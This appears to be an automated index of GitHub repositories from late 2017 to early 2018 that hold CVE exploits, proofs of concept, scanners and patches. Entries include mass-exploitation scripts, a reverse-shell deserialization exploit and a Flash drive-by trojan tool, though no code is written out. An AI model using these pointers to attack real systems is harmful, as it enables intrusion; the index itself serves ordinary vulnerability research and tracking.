**CVE-2017-1635 PoC code** : [emcalv/tivoli-poc](https://github.com/emcalv/tivoli-poc) create time: 2018-02-06T09:43:28Z

**To solve CTFS.me problem** : [awidardi/opsxcq-cve-2016-10033](https://github.com/awidardi/opsxcq-cve-2016-10033) create time: 2018-02-06T08:59:14Z

**Apache RewriteRule to mitigate potential DoS attack via Wordpress wp-admin/load-scripts.php file** : [yolabingo/wordpress-fix-cve-2018-6389](https://github.com/yolabingo/wordpress-fix-cve-2018-6389) create time: 2018-02-06T01:43:33Z

**Test and exploit for CVE-2017-12542** : [skelsec/CVE-2017-12542](https://github.com/skelsec/CVE-2017-12542) create time: 2018-02-05T18:55:56Z

**CVE-2018-3608 Trend_Micro_CVE** : [ZhiyuanWang-Chengdu-Qihoo360/Trend_Micro_POC](https://github.com/ZhiyuanWang-Chengdu-Qihoo360/Trend_Micro_POC) create time: 2018-02-05T12:22:28Z

**CVE-2017-4878 Samples - http://blog.talosintelligence.com/2018/02/group-123-goes-wild.html** : [brianwrf/CVE-2017-4878-Samples](https://github.com/brianwrf/CVE-2017-4878-Samples) create time: 2018-02-05T05:01:40Z

**phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)** : [minervais/pocs](https://github.com/minervais/pocs) create time: 2018-02-03T22:26:09Z

**Squid 3.x before 3.5.15 and 4.x before 4.0.7 does not properly append data to String objects, which allows remote servers to cause a denial of service (assertion failure and daemon exit) via a long string, as demonstrated by a crafted HTTP Vary header.** : [amit-raut/CVE-2016-2569](https://github.com/amit-raut/CVE-2016-2569) create time: 2018-02-03T20:47:08Z

**no description** : [huzhenghui/Test-7-2-1-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711) create time: 2018-02-01T06:00:14Z

**no description** : [huzhenghui/Test-7-2-0-PHP-CVE-2018-5711](https://github.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711) create time: 2018-02-01T04:21:13Z

**[CVE-2018-6479] Netwave IP Camera server vulnerable to Denial of Service via one single huge POST request.** : [dreadlocked/netwave-dosvulnerability](https://github.com/dreadlocked/netwave-dosvulnerability) create time: 2018-01-31T16:38:48Z

**[CVE-2018-6407 & CVE-2018-6408] Conceptronic IPCam Administration panel CSRF and Denial of Service** : [dreadlocked/ConceptronicIPCam_MultipleVulnerabilities](https://github.com/dreadlocked/ConceptronicIPCam_MultipleVulnerabilities) create time: 2018-01-29T20:36:54Z

**ERPScan Public POC for CVE-2018-2636** : [erpscanteam/CVE-2018-2636](https://github.com/erpscanteam/CVE-2018-2636) create time: 2018-01-29T15:16:02Z

**CVE-2017-10797- User Enumeration in OwnCloud Server 8.1-10.0** : [n4xh4ck5/CVE-2017-10797](https://github.com/n4xh4ck5/CVE-2017-10797) create time: 2018-01-29T11:53:14Z

**Working POC for CVE 2017-5638** : [cafnet/apache-struts-v2-CVE-2017-5638](https://github.com/cafnet/apache-struts-v2-CVE-2017-5638) create time: 2018-01-28T05:17:04Z

**Naive shell script to verify Meltdown (CVE-2017-5754) patch status of EC2 instances** : [jdmulloy/meltdown-aws-scanner](https://github.com/jdmulloy/meltdown-aws-scanner) create time: 2018-01-26T21:18:13Z

**no description** : [zarou3/https-github.com-cveaswaran-ELSpring2018](https://github.com/zarou3/https-github.com-cveaswaran-ELSpring2018) create time: 2018-01-25T14:23:38Z

**The Demo for CVE-2018-1000006** : [CHYbeta/CVE-2018-1000006-DEMO](https://github.com/CHYbeta/CVE-2018-1000006-DEMO) create time: 2018-01-25T02:38:44Z

**not yet fin** : [rockl/cve-2017-7184-bak](https://github.com/rockl/cve-2017-7184-bak) create time: 2018-01-25T02:10:45Z

**the job is not yet finished** : [rockl/cve-2017-7184](https://github.com/rockl/cve-2017-7184) create time: 2018-01-25T01:55:47Z

**MikroTik RouterOS Denial of Service Vulnerability** : [Nat-Lab/CVE-2018-5951](https://github.com/Nat-Lab/CVE-2018-5951) create time: 2018-01-25T01:40:02Z

**BMC Bladelogic RSCD exploits including remote code execution - CVE-2016-1542, CVE-2016-1543, CVE-2016-5063** : [bao7uo/bmc_bladelogic](https://github.com/bao7uo/bmc_bladelogic) create time: 2018-01-24T16:03:22Z

**CVE-2017-7269利用代码(rb文件)** : [mirrorblack/CVE-2017-7269](https://github.com/mirrorblack/CVE-2017-7269) create time: 2018-01-24T03:51:58Z

**Security hotfix for CVE-2017-8802** : [ozzi-/Zimbra-CVE-2017-8802-Hotifx](https://github.com/ozzi-/Zimbra-CVE-2017-8802-Hotifx) create time: 2018-01-23T14:56:18Z

**Cisco iOS SNMP Overflow Exploit Toolkit (CVE-2017-6736)** : [GarnetSunset/CiscoIOSSNMPToolkit](https://github.com/GarnetSunset/CiscoIOSSNMPToolkit) create time: 2018-01-22T21:15:43Z

**Javascript Web-Kit exploit. CVE-2017-7061. By Lokihardt from Google Project Zero** : [TheLoneHaxor/jailbreakme103](https://github.com/TheLoneHaxor/jailbreakme103) create time: 2018-01-22T21:14:30Z

**Unquoted Path Service** : [lajarajorge/CVE-2017-1000475](https://github.com/lajarajorge/CVE-2017-1000475) create time: 2018-01-22T21:10:22Z

**no description** : [Palvinder-Singh/PS_CVE2018-0802](https://github.com/Palvinder-Singh/PS_CVE2018-0802) create time: 2018-01-22T07:45:06Z

**CVE-2018-4280: Mach port replacement vulnerability in launchd on macOS 10.13.5 leading to local privilege escalation and SIP bypass.** : [bazad/launchd-portrep](https://github.com/bazad/launchd-portrep) create time: 2018-01-22T06:22:59Z

**no description** : [dewankpant/CVE-2017-16568](https://github.com/dewankpant/CVE-2017-16568) create time: 2018-01-21T03:17:56Z

**备忘:flash挂马工具备份 CVE-2018-4878** : [ydl555/CVE-2018-4878-](https://github.com/ydl555/CVE-2018-4878-) create time: 2018-01-20T12:32:26Z

**WebLogic wls-wsat RCE CVE-2017-10271** : [peterpeter228/Oracle-WebLogic-CVE-2017-10271](https://github.com/peterpeter228/Oracle-WebLogic-CVE-2017-10271) create time: 2018-01-19T15:50:08Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [bmcculley/CVE-2017-10271](https://github.com/bmcculley/CVE-2017-10271) create time: 2018-01-18T22:07:33Z

**PoC for Meltdown in linux (CVE-2017-5754)** : [zzado/Meltdown](https://github.com/zzado/Meltdown) create time: 2018-01-18T16:32:50Z

**Struts2 Application Vulnerable to CVE-2017-5638. Explains how the exploit of the vulnerability works in relation to OGNL and the JakartaMultiPart parser.** : [grant100/cybersecurity-struts2](https://github.com/grant100/cybersecurity-struts2) create time: 2018-01-18T15:19:39Z

**A quick-and-dirty tool to verify that userspace executables are immune to Spectre variant 2 (CVE-2017-5715).** : [dmo2118/retpoline-audit](https://github.com/dmo2118/retpoline-audit) create time: 2018-01-18T06:55:53Z

**cve-2017-10271 POC** : [SuperHacker-liuan/cve-2017-10271-poc](https://github.com/SuperHacker-liuan/cve-2017-10271-poc) create time: 2018-01-18T03:21:15Z

**A POC chain exploit using the recent Cisco SMP exploit (CVE-2017-6736) to chain into Spectre (CVE-2017-5753 and CVE-2017-5715)** : [GarnetSunset/CiscoSpectreTakeover](https://github.com/GarnetSunset/CiscoSpectreTakeover) create time: 2018-01-17T17:26:14Z

**mass exploit CVE - 2017-16894** : [LuanDevecchi/CVE201716894](https://github.com/LuanDevecchi/CVE201716894) create time: 2018-01-17T14:24:04Z

**Minishare 1.4.1 Remote Buffer Overflow** : [kkirsche/CVE-2004-2271](https://github.com/kkirsche/CVE-2004-2271) create time: 2018-01-17T03:18:32Z

**no description** : [likescam/CVE-2018-0802_CVE-2017-11882](https://github.com/likescam/CVE-2018-0802_CVE-2017-11882) create time: 2018-01-16T05:49:01Z

**no description** : [likescam/CVE-2017-11882](https://github.com/likescam/CVE-2017-11882) create time: 2018-01-16T05:47:47Z

**Proof of concept of CVE-2017-0807** : [kpatsakis/PoC_CVE-2017-0807](https://github.com/kpatsakis/PoC_CVE-2017-0807) create time: 2018-01-16T04:34:06Z

**CVE-2017-10271 Weblogic 漏洞验证Poc及补丁** : [pssss/CVE-2017-10271](https://github.com/pssss/CVE-2017-10271) create time: 2018-01-16T03:10:48Z

**Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)** : [bao7uo/dp_crypto](https://github.com/bao7uo/dp_crypto) create time: 2018-01-16T00:23:34Z

**Assesses a system for the "speculative execution" vulnerabilities described in CVE-2017-5715, CVE-2017-5753, CVE-2017-5754** : [GregAskew/SpeculativeExecutionAssessment](https://github.com/GregAskew/SpeculativeExecutionAssessment) create time: 2018-01-15T19:14:30Z

**diff for CVE-2017-0785 (Blueborne)** : [SigBitsLabs/diff](https://github.com/SigBitsLabs/diff) create time: 2018-01-14T19:36:03Z

**a list of BIOS/Firmware fixes adressing CVE-2017-5715, CVE-2017-5753, CVE-2017-5754** : [mathse/meltdown-spectre-bios-list](https://github.com/mathse/meltdown-spectre-bios-list) create time: 2018-01-14T11:52:38Z

**PoC for CVE-2018-0802 And CVE-2017-11882** : [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802) create time: 2018-01-12T11:38:33Z

**PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)** : [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802) create time: 2018-01-11T09:43:46Z

**Exploit the vulnerability to execute the calculator** : [zldww2011/CVE-2018-0802_POC](https://github.com/zldww2011/CVE-2018-0802_POC) create time: 2018-01-11T09:16:32Z

**ION通用提权漏洞PoC以及分析** : [guoygang/CVE-2017-0564-ION-PoC](https://github.com/guoygang/CVE-2017-0564-ION-PoC) create time: 2018-01-11T02:50:26Z

**CVE-2015-0816 + CVE-2015-0802** : [Afudadi/Firefox-35-37-Exploit](https://github.com/Afudadi/Firefox-35-37-Exploit) create time: 2018-01-10T11:21:36Z

**Proof of Concept exploit for CVE-2017-8570** : [rxwx/CVE-2017-8570](https://github.com/rxwx/CVE-2017-8570) create time: 2018-01-09T19:09:33Z

**TwonkyMedia Server 7.0.11-8.5 Directory Traversal CVE-2018-7171** : [mechanico/sharingIsCaring](https://github.com/mechanico/sharingIsCaring) create time: 2018-01-09T17:01:45Z

**Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)** : [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto) create time: 2018-01-09T13:53:57Z

**8.4.1 Jailbreak using CVE-2016-4655 / CVE-2016-4656** : [Cryptiiiic/skybreak](https://github.com/Cryptiiiic/skybreak) create time: 2018-01-09T07:44:50Z

**Spectre exploit** : [opsxcq/exploit-cve-2017-5715](https://github.com/opsxcq/exploit-cve-2017-5715) create time: 2018-01-09T05:06:12Z

**Simply diff for CVE-2017-0785** : [sigbitsadmin/diff](https://github.com/sigbitsadmin/diff) create time: 2018-01-07T18:30:42Z

**CVE-2014-10069** : [Manouchehri/hitron-cfg-decrypter](https://github.com/Manouchehri/hitron-cfg-decrypter) create time: 2018-01-07T14:37:29Z

**OSX 10.13.2, CVE-2017-5753, Spectre, PoC, C, ASM for OSX, MAC, Intel Arch, Proof of Concept, Hopper.App Output** : [albertleecn/cve-2017-5753](https://github.com/albertleecn/cve-2017-5753) create time: 2018-01-07T02:46:38Z

**The demo of the speculative execution attack Spectre (CVE-2017-5753, CVE-2017-5715).** : [ixtal23/spectreScope](https://github.com/ixtal23/spectreScope) create time: 2018-01-06T18:27:03Z

**Proof-of-concept / Exploit / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a** : [speecyy/Am-I-affected-by-Meltdown](https://github.com/speecyy/Am-I-affected-by-Meltdown) create time: 2018-01-06T03:16:33Z

**Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)** : [pedrolucasoliva/spectre-attack-demo](https://github.com/pedrolucasoliva/spectre-attack-demo) create time: 2018-01-06T01:08:15Z

**Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)** : [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271) create time: 2018-01-05T21:57:03Z

**This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to. This tool is originally based on Microsoft: https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in** : [Viralmaniar/In-Spectre-Meltdown](https://github.com/Viralmaniar/In-Spectre-Meltdown) create time: 2018-01-05T09:43:04Z

**A Simple PoC for CVE-2012-4681** : [ZH3FENG/PoCs-CVE_2012_4681](https://github.com/ZH3FENG/PoCs-CVE_2012_4681) create time: 2018-01-05T08:10:34Z

**2018年1月2日 (CVE-2017-5753 和 CVE-2017-5715) "幽灵" Spectre 漏洞利用** : [poilynx/spectre-attack-example](https://github.com/poilynx/spectre-attack-example) create time: 2018-01-05T05:51:34Z

**Meltdown Exploit / Proof-of-concept / checks whether system is affected by Variant 3: rogue data cache load (CVE-2017-5754), a.k.a MELTDOWN.** : [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown) create time: 2018-01-04T23:51:12Z

**Spectre (CVE-2017-5753) (CVE-2017-5715). Not By Me. Collected from Book.** : [EdwardOwusuAdjei/Spectre-PoC](https://github.com/EdwardOwusuAdjei/Spectre-PoC) create time: 2018-01-04T14:20:13Z

**SpecuCheck is a Windows utility for checking the state of the software mitigations and hardware against CVE-2017-5754 (Meltdown), CVE-2017-5715 (Spectre v2), CVE-2018-3260 (Foreshadow), and CVE-2018-3639 (Spectre v4)** : [ionescu007/SpecuCheck](https://github.com/ionescu007/SpecuCheck) create time: 2018-01-04T04:32:26Z

**Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715)** : [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) create time: 2018-01-04T00:28:50Z

**A proof-of-concept for CVE-2017-16997** : [Xiami2012/CVE-2017-16997-poc](https://github.com/Xiami2012/CVE-2017-16997-poc) create time: 2018-01-03T09:31:55Z

**forked from https://github.com/s3xy/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.Modified by hanc00l** : [cjjduck/weblogic_wls_wsat_rce](https://github.com/cjjduck/weblogic_wls_wsat_rce) create time: 2018-01-03T06:14:28Z

**no description** : [lr3800/CVE-2017-17692](https://github.com/lr3800/CVE-2017-17692) create time: 2018-01-02T13:47:36Z

**Suite de herramientas que sacan partido del CVE-2017-9097 (+RCE)** : [MDudek-ICS/AntiWeb_testing-Suite](https://github.com/MDudek-ICS/AntiWeb_testing-Suite) create time: 2018-01-02T11:28:40Z

**credit to artkond** : [1337g/CVE-2017-3881](https://github.com/1337g/CVE-2017-3881) create time: 2018-01-02T01:45:15Z

**Exploit for CVE-2003-0264 based on pwntools and metasploit's windows/reverse_tcp** : [adenkiewicz/CVE-2003-0264](https://github.com/adenkiewicz/CVE-2003-0264) create time: 2018-01-01T22:49:13Z

**Simple uc httpd exploit made with py3.. this exploit was written from CVE-2014-2324** : [sp4c30x1/uc_httpd_exploit](https://github.com/sp4c30x1/uc_httpd_exploit) create time: 2017-12-30T17:46:39Z

**no description** : [ghhubin/weblogic_cve2017-20271](https://github.com/ghhubin/weblogic_cve2017-20271) create time: 2017-12-29T07:48:10Z

**no description** : [xyzAsian/Janus-CVE-2017-13156](https://github.com/xyzAsian/Janus-CVE-2017-13156) create time: 2017-12-29T07:11:42Z

**CVE-2017-10271 POC** : [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271) create time: 2017-12-28T07:19:13Z

**WebLogic Exploit** : [c0mmand3rOpSec/CVE-2017-10271](https://github.com/c0mmand3rOpSec/CVE-2017-10271) create time: 2017-12-28T01:30:50Z

**CVE-2017-17562 GOAHEAD RCE (Author: Daniel Hodson)** : [1337g/CVE-2017-17562](https://github.com/1337g/CVE-2017-17562) create time: 2017-12-27T05:46:50Z

**CVE-2017-12615 Tomcat RCE (TESTED)** : [1337g/CVE-2017-12615](https://github.com/1337g/CVE-2017-12615) create time: 2017-12-26T03:48:14Z

**Simplified PoC for Weblogic-CVE-2017-10271** : [ZH3FENG/PoCs-Weblogic_2017_10271](https://github.com/ZH3FENG/PoCs-Weblogic_2017_10271) create time: 2017-12-25T13:18:45Z

**Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.** : [s3xy/CVE-2017-10271](https://github.com/s3xy/CVE-2017-10271) create time: 2017-12-25T06:11:54Z

**CVE-2017-17215 HuaWei Router RCE (NOT TESTED)** : [1337g/CVE-2017-17215](https://github.com/1337g/CVE-2017-17215) create time: 2017-12-25T06:11:24Z

**Android Tethering Provisioning Check Bypass (CVE-2017-0554)** : [lanrat/tethr](https://github.com/lanrat/tethr) create time: 2017-12-24T23:18:28Z

**CVE-2017-10271 WEBLOGIC RCE (TESTED)** : [1337g/CVE-2017-10271](https://github.com/1337g/CVE-2017-10271) create time: 2017-12-23T13:04:23Z

**POCs for CVE-2017-13672 (OOB read in VGA Cirrus QEMU driver, causing DoS)** : [DavidBuchanan314/CVE-2017-13672](https://github.com/DavidBuchanan314/CVE-2017-13672) create time: 2017-12-22T20:08:33Z

**CVE-2017-12149 JBOSS RCE (TESTED)** : [1337g/CVE-2017-12149](https://github.com/1337g/CVE-2017-12149) create time: 2017-12-22T07:30:29Z

**CVE-2017-15944 Palo Alto Networks firewalls remote root code execution POC** : [xxnbyy/CVE-2017-15944-POC](https://github.com/xxnbyy/CVE-2017-15944-POC) create time: 2017-12-19T04:43:24Z

**CVE-2017-7525 S2-055 Exploit** : [Nazicc/S2-055](https://github.com/Nazicc/S2-055) create time: 2017-12-19T01:02:04Z

**Apache synapse 反序列化 CVE–2017–15708** : [HuSoul/CVE-2017-15708](https://github.com/HuSoul/CVE-2017-15708) create time: 2017-12-18T10:27:58Z

**CVE-2018-4331: Exploit for a race condition in the GSSCred system service on iOS 11.2.** : [bazad/gsscred-race](https://github.com/bazad/gsscred-race) create time: 2017-12-16T08:48:08Z

**Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Local Privilege Escalation and vulnerable container** : [t0kx/privesc-CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426) create time: 2017-12-16T01:16:44Z

**Sudo <= 1.8.14 Local Privilege Escalation and vulnerable container** : [t0kx/privesc-CVE-2015-5602](https://github.com/t0kx/privesc-CVE-2015-5602) create time: 2017-12-16T00:23:30Z

**Script criado para exploração em massa [CVE - 2017-16894]** : [H3dI/ENV-Mass-Exploit](https://github.com/H3dI/ENV-Mass-Exploit) create time: 2017-12-12T22:59:45Z

**RTF Cleaner, tries to extract URL from malicious RTF samples using CVE-2017-0199 & CVE-2017-8759** : [jacobsoo/RTF-Cleaner](https://github.com/jacobsoo/RTF-Cleaner) create time: 2017-12-08T09:45:25Z

**CVE-2018-4343: Proof-of-concept for a use-after-free in the GSSCred daemon on macOS and iOS.** : [bazad/gsscred-move-uaf](https://github.com/bazad/gsscred-move-uaf) create time: 2017-12-08T09:15:37Z

**An demonstration of how to exploit double-fetch vulnerability CVE-2016-6516** : [wpengfei/CVE-2016-6516-exploit](https://github.com/wpengfei/CVE-2016-6516-exploit) create time: 2017-12-07T01:55:39Z

**no description** : [acidburnmi/CVE-2016-5195-master](https://github.com/acidburnmi/CVE-2016-5195-master) create time: 2017-12-06T17:36:19Z

**Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923** : [ansjdnakjdnajkd/CVE-2017-7038](https://github.com/ansjdnakjdnajkd/CVE-2017-7038) create time: 2017-12-06T15:31:08Z

**Better Exploit Code For CVE 2017 9805 apache struts** : [chrisjd20/cve-2017-9805.py](https://github.com/chrisjd20/cve-2017-9805.py) create time: 2017-12-04T18:23:53Z

**Struts2の脆弱性S2-045, S2-055 および Jackson の脆弱性 CVE-2017-7525, CVE-2017-15095 の調査報告** : [SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095](https://github.com/SecureSkyTechnology/study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-15095) create time: 2017-12-04T10:07:28Z

**no description** : [Q2h1Cg/CVE-2017-1000117](https://github.com/Q2h1Cg/CVE-2017-1000117) create time: 2017-12-03T08:58:18Z

**no description** : [giovannidispoto/CVE-2017-13872-Patch](https://github.com/giovannidispoto/CVE-2017-13872-Patch) create time: 2017-11-30T08:22:00Z

**A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405)** : [bindecy/HugeDirtyCowPOC](https://github.com/bindecy/HugeDirtyCowPOC) create time: 2017-11-29T22:19:51Z

**Exploit for piwik CVE-2009-4140 RCE** : [Alexeyan/CVE-2009-4137](https://github.com/Alexeyan/CVE-2009-4137) create time: 2017-11-28T19:31:47Z

**CVE-2017-12149 jboss反序列化 可回显** : [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149) create time: 2017-11-28T02:52:47Z

**Tomcat 远程代码执行漏洞 Exploit** : [BeyondCy/CVE-2017-12615](https://github.com/BeyondCy/CVE-2017-12615) create time: 2017-11-28T02:51:16Z

**CVE-2017-9805 - Exploit** : [BeyondCy/S2-052](https://github.com/BeyondCy/S2-052) create time: 2017-11-28T02:46:07Z

**Exploiting CVE-2016-2334 7zip HFS+ vulnerability** : [icewall/CVE-2016-2334](https://github.com/icewall/CVE-2016-2334) create time: 2017-11-27T15:36:50Z

**no description** : [Shadowshusky/CVE-2017-11882-](https://github.com/Shadowshusky/CVE-2017-11882-) create time: 2017-11-27T01:50:44Z

**no description** : [sudosammy/CVE-2017-15394](https://github.com/sudosammy/CVE-2017-15394) create time: 2017-11-26T15:32:04Z

**CVE-2015-4852 Oracle WebLogic Scanner** : [AndersonSingh/serialization-vulnerability-scanner](https://github.com/AndersonSingh/serialization-vulnerability-scanner) create time: 2017-11-25T21:20:02Z

**Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)** : [0x00-0x00/-CVE-2017-9805](https://github.com/0x00-0x00/-CVE-2017-9805) create time: 2017-11-24T14:46:35Z

**no description** : [CSC-pentest/cve-2017-11882](https://github.com/CSC-pentest/cve-2017-11882) create time: 2017-11-24T10:09:49Z

**# CVE-2017-11882-metasploit This is a Metasploit module which exploits CVE-2017-11882 using the POC below: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about. ## Installation 1) Copy the cve_2017_11882.rb to /usr/share/metasploit-framework/modules/exploits/windows/local/ 2) Copy the cve-2017-11882.rtf to /usr/share/metasploit-framework/data/exploits/ This module is a quick port to Metasploit and uses mshta.exe to execute the payload. There are better ways to implement this module and exploit but will update it as soon as I have the time.** : [legendsec/CVE-2017-11882-for-Kali](https://github.com/legendsec/CVE-2017-11882-for-Kali) create time: 2017-11-24T07:11:13Z

**Shellshock exploitation script that is able to upload and RCE using any vector due to its versatility.** : [0x00-0x00/CVE-2014-6271](https://github.com/0x00-0x00/CVE-2014-6271) create time: 2017-11-23T14:45:22Z

**CVE-2017-9430 Fix** : [j0lama/Dnstracer-1.9-Fix](https://github.com/j0lama/Dnstracer-1.9-Fix) create time: 2017-11-22T09:19:53Z

**no description** : [Grey-Li/CVE-2017-11882](https://github.com/Grey-Li/CVE-2017-11882) create time: 2017-11-22T04:53:44Z

**CVE-2017-11882 exploitation** : [starnightcyber/CVE-2017-11882](https://github.com/starnightcyber/CVE-2017-11882) create time: 2017-11-22T01:11:39Z

**CVE-2017-11882** : [HZachev/ABC](https://github.com/HZachev/ABC) create time: 2017-11-21T21:07:57Z

**This is a Metasploit module which exploits CVE-2017-11882 using the POC released here : https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about.** : [0x09AL/CVE-2017-11882-metasploit](https://github.com/0x09AL/CVE-2017-11882-metasploit) create time: 2017-11-21T18:17:28Z

**CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.** : [unamer/CVE-2017-11882](https://github.com/unamer/CVE-2017-11882) create time: 2017-11-21T15:22:41Z

**CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)** : [sevck/CVE-2017-12149](https://github.com/sevck/CVE-2017-12149) create time: 2017-11-21T10:48:24Z

**CVE-2017-11882 File Generator PoC** : [BlackMathIT/2017-11882_Generator](https://github.com/BlackMathIT/2017-11882_Generator) create time: 2017-11-21T09:15:28Z

**CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882** : [Ridter/CVE-2017-11882](https://github.com/Ridter/CVE-2017-11882) create time: 2017-11-21T05:55:53Z

**Proof-of-Concept exploits for CVE-2017-11882** : [embedi/CVE-2017-11882](https://github.com/embedi/CVE-2017-11882) create time: 2017-11-20T16:35:30Z

**Exploits CVE-2016-10033 and CVE-2016-10045** : [pedro823/cve-2016-10033-45](https://github.com/pedro823/cve-2016-10033-45) create time: 2017-11-19T19:31:45Z

**CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0** : [stefanlucas/Exploit-Joomla](https://github.com/stefanlucas/Exploit-Joomla) create time: 2017-11-19T16:50:39Z

**no description** : [zhouat/cve-2017-11882](https://github.com/zhouat/cve-2017-11882) create time: 2017-11-19T14:57:41Z

**no description** : [bloomer1016/2017-11-17-Maldoc-Using-CVE-2017-0199](https://github.com/bloomer1016/2017-11-17-Maldoc-Using-CVE-2017-0199) create time: 2017-11-17T20:00:29Z

**Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS (Crash) only** : [marcinguy/blueborne-CVE-2017-1000251](https://github.com/marcinguy/blueborne-CVE-2017-1000251) create time: 2017-11-16T10:35:05Z

**CVE-2017-13089** : [mzeyong/CVE-2017-13089](https://github.com/mzeyong/CVE-2017-13089) create time: 2017-11-15T08:22:58Z

**Python exploit for CVE-2017-16806** : [rickoooooo/ulteriusExploit](https://github.com/rickoooooo/ulteriusExploit) create time: 2017-11-13T22:48:46Z

**Chrome < 62 uxss exploit (CVE-2017-5124)** : [Bo0oM/CVE-2017-5124](https://github.com/Bo0oM/CVE-2017-5124) create time: 2017-11-13T21:33:55Z

**Proof of concept exploit script for CVE-2017-1000250. Written while researching for the essay in TTM4137 Wireless Security.** : [olav-st/CVE-2017-1000250-PoC](https://github.com/olav-st/CVE-2017-1000250-PoC) create time: 2017-11-12T18:18:52Z

**Fork of github.com/spring-projects/spring-data-rest (vulnerable to CVE-2017-8046)** : [sj/spring-data-rest-CVE-2017-8046](https://github.com/sj/spring-data-rest-CVE-2017-8046) create time: 2017-11-08T16:39:11Z

**Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D** : [realistic-security/CVE-2017-16524](https://github.com/realistic-security/CVE-2017-16524) create time: 2017-11-05T13:32:43Z

**RTF de-obfuscator for CVE-2017-0199 documents to find URLs statically.** : [nicpenning/RTF-Cleaner](https://github.com/nicpenning/RTF-Cleaner) create time: 2017-11-03T16:47:16Z

**Exploit for the linux kernel vulnerability CVE-2017-5123** : [0x5068656e6f6c/CVE-2017-5123](https://github.com/0x5068656e6f6c/CVE-2017-5123) create time: 2017-11-03T02:52:26Z

**tomcat-put-cve-2017-12615** : [wsg00d/cve-2017-12615](https://github.com/wsg00d/cve-2017-12615) create time: 2017-11-01T16:05:32Z

**linux kernel exploit** : [FloatingGuy/CVE-2017-5123](https://github.com/FloatingGuy/CVE-2017-5123) create time: 2017-10-31T03:35:31Z

**no description** : [skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491](https://github.com/skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491) create time: 2017-10-30T14:02:52Z

**This is the Apache Struts CVE-2017-5638 struts 2 vulnerability. The same CVE that resulted in the equifax database breach.** : [donaldashdown/Common-Vulnerability-and-Exploit](https://github.com/donaldashdown/Common-Vulnerability-and-Exploit) create time: 2017-10-30T05:21:53Z

**no description** : [Winter3un/cve_2017_8759](https://github.com/Winter3un/cve_2017_8759) create time: 2017-10-29T13:12:04Z

**no description** : [Winter3un/cve_2017_0199](https://github.com/Winter3un/cve_2017_0199) create time: 2017-10-29T13:03:01Z

**This exploit was written to study some concepts, enjoy!** : [M31MOTH/cve-2010-4221](https://github.com/M31MOTH/cve-2010-4221) create time: 2017-10-28T20:37:26Z

**no description** : [angeloanatrella86/CVE-2017](https://github.com/angeloanatrella86/CVE-2017) create time: 2017-10-28T13:47:21Z

**PoC for wget v1.19.1** : [r1b/CVE-2017-13089](https://github.com/r1b/CVE-2017-13089) create time: 2017-10-27T20:06:11Z

**Reimplementation of CVE-2017-15361 checker in C** : [0xxon/roca](https://github.com/0xxon/roca) create time: 2017-10-25T15:16:11Z

**Bro plugin to check if certificates are affected by CVE-2017-15361** : [0xxon/zeek-plugin-roca](https://github.com/0xxon/zeek-plugin-roca) create time: 2017-10-25T01:10:06Z

**no description** : [dewankpant/CVE-2017-16567](https://github.com/dewankpant/CVE-2017-16567) create time: 2017-10-24T02:54:08Z

